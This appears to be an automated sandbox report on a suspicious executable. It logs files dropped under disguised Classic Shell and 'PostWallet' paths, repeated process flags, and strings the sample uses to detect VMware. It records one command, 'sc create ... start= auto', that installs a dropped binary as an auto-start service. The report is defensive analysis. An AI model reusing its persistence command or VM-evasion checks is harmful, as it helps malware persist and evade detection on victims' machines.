          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ClassicIE_64.exe.13.drStatic PE information: 0xF72C17BC [Mon May 30 02:06:52 2101 UTC]
          Source: Main.dll.8.drStatic PE information: section name: .didata
          Source: ClassicIE_64.dll.13.drStatic PE information: section name: .didata
          Source: ClassicIEDLL_64.dll.13.drStatic PE information: section name: _RDATA
          Source: ClassicIE_64.exe.13.drStatic PE information: section name: .didat
          Source: ClassicStartMenuDLL.dll.13.drStatic PE information: section name: text
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848E1D2A5 pushad ; iretd 3_2_00007FF848E1D2A6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F4B688 push esp; retf 5F4Fh3_2_00007FF848F505D9
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F4B688 push ds; retf 5F4Fh3_2_00007FF848F5060F
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F47967 push ebx; retf 3_2_00007FF848F4796A
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F300BD pushad ; iretd 3_2_00007FF848F300C1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF78200 push ecx; ret 4_2_6CF78213
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E39F601 push ecx; ret 4_2_6E39F614
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E39F800 push eax; ret 4_2_6E39F81E
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\Update.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED5EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,4_2_00ED5EE0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF7732C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_6CF7732C
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contain functionality to detect virtual machines
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe vmware-vmx-stats.exe 4_2_00ED20B0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe VMware 4_2_00ED2480
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Workstation VMware 4_2_00ED2450
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware VMware VMware 4_2_00ED2DF0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe vmware-vmx-debug.exe vmware-vmx-stats.exe vmware-vmx-debug.exe vmware-vmx-debug.exe 4_2_00ED1FB0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Authorization Service VMware Authorization Service 4_2_00ED3F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Server Console VMware Server Console 4_2_00ED3360
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe 4_2_00ED4D00
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1A630000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile opened / queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile opened / queried: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1793Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1301Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-35848
